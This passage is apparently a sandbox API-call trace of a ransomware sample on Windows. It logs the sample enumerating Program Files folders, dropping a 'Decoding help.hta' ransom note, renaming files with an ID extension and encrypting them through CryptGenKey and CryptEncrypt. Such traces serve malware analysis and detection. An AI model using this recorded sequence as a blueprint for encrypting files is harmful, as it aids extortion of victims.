lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.696] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MsMpRes.dll") returned -1 [0039.696] lstrlenW (lpString="MsMpRes.dll") returned 11 [0039.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MsMpRes.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll" [0039.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll" [0039.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll" (normalized: "c:\\program files\\windows defender\\msmpres.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\msmpres.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.696] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1594a6b3, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x1594a6b3, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x36199360, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x77200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpRes.dll", cAlternateFileName="")) returned 0 [0039.696] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 92 os_tid = 0xba4 [0039.663] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\*.*", lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55b0 [0039.664] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.664] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.664] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.664] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.664] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.664] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.664] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.664] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.664] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US" [0039.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0039.664] GlobalMemoryStatus (in: lpBuffer=0x8f4fd10 | out: lpBuffer=0x8f4fd10) [0039.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ea0c78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.669] CloseHandle (hObject=0x134) returned 1 [0039.669] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd67b24e0, ftCreationTime.dwHighDateTime=0x1d4f825, ftLastAccessTime.dwLowDateTime=0x88813d90, ftLastAccessTime.dwHighDateTime=0x1d4e6d9, ftLastWriteTime.dwLowDateTime=0x88813d90, ftLastWriteTime.dwHighDateTime=0x1d4e6d9, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="gold substantially.exe", cAlternateFileName="GOLDSU~1.EXE")) returned 1 [0039.669] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.669] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0xffffffff [0039.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.669] WriteFile (in: hFile=0x134, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8f4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.670] CloseHandle (hObject=0x134) returned 1 [0039.671] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.671] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gold substantially.exe") returned -1 [0039.671] lstrlenW (lpString="gold substantially.exe") returned 22 [0039.671] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="gold substantially.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe") returned="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe" [0039.671] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe") returned="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe" [0039.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe" (normalized: "c:\\program files\\windows journal\\gold substantially.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\gold substantially.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.671] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\gold substantially.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.672] CreateFileMappingA (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x184 [0039.672] CryptAcquireContextA (in: phProv=0x8f4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f4fcec*=0x5dc830) returned 1 [0039.672] CryptGenKey (in: hProv=0x5dc830, Algid=0x6610, dwFlags=0x1, phKey=0x8f4fce8 | out: phKey=0x8f4fce8*=0x5a55f0) returned 1 [0039.672] CryptExportKey (in: hKey=0x5a55f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x8f4fbe4, pdwDataLen=0x8f4fce4 | out: pbData=0x8f4fbe4*, pdwDataLen=0x8f4fce4*=0x2c) returned 1 [0039.672] MapViewOfFile (hFileMappingObject=0x184, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.675] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8f4fbe4*, pdwDataLen=0x8f4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x8f4fbe4*, pdwDataLen=0x8f4fcf8*=0x100) returned 1 [0039.675] CryptEncrypt (in: hKey=0x5a55f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x8f4fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x8f4fce4*=0x12800) returned 1 [0039.676] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.678] CloseHandle (hObject=0x184) returned 1 [0039.678] CryptDestroyKey (hKey=0x5a55f0) returned 1 [0039.678] CryptReleaseContext (hProv=0x5dc830, dwFlags=0x0) returned 1 [0039.678] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.678] WriteFile (in: hFile=0x134, lpBuffer=0x8f4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x8f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x8f4fbe4*, lpNumberOfBytesWritten=0x8f4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.678] WriteFile (in: hFile=0x134, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x8f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x8f4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.679] CloseHandle (hObject=0x134) returned 1 [0039.680] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\gold substantially.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.680] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c0db86, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x88c0db86, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29c54b90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xe3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkSeg.dll", cAlternateFileName="")) returned 1 [0039.680] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.680] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.680] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkSeg.dll") returned -1 [0039.680] lstrlenW (lpString="InkSeg.dll") returned 10 [0039.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.680] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="InkSeg.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll" [0039.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll" [0039.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll" (normalized: "c:\\program files\\windows journal\\inkseg.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\InkSeg.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\inkseg.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.701] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c554863, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8c554863, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2aeed770, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x154400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNTFiltr.dll", cAlternateFileName="")) returned 1 [0039.701] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.701] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JNTFiltr.dll") returned -1 [0039.701] lstrlenW (lpString="JNTFiltr.dll") returned 12 [0039.701] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="JNTFiltr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll" [0039.701] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll" [0039.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll" (normalized: "c:\\program files\\windows journal\\jntfiltr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\JNTFiltr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\jntfiltr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.701] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b77e99a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b77e99a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b043430, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x156800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNWDRV.dll", cAlternateFileName="")) returned 1 [0039.701] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.701] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JNWDRV.dll") returned -1 [0039.701] lstrlenW (lpString="JNWDRV.dll") returned 10 [0039.701] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="JNWDRV.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll" [0039.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll" [0039.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll" (normalized: "c:\\program files\\windows journal\\jnwdrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\JNWDRV.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\jnwdrv.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.711] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77861d5d, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x77861d5d, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0b6020, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwdui.dll", cAlternateFileName="")) returned 1 [0039.711] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.711] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.711] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jnwdui.dll") returned -1 [0039.711] lstrlenW (lpString="jnwdui.dll") returned 10 [0039.711] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.711] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="jnwdui.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll" [0039.711] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll" [0039.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll" (normalized: "c:\\program files\\windows journal\\jnwdui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\jnwdui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\jnwdui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.712] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778fa2d1, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x778fa2d1, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0b6020, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwmon.dll", cAlternateFileName="")) returned 1 [0039.712] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.712] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.712] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jnwmon.dll") returned -1 [0039.712] lstrlenW (lpString="jnwmon.dll") returned 10 [0039.712] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.712] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="jnwmon.dll" | out: lpString1="\\\\?\\C:\\Program 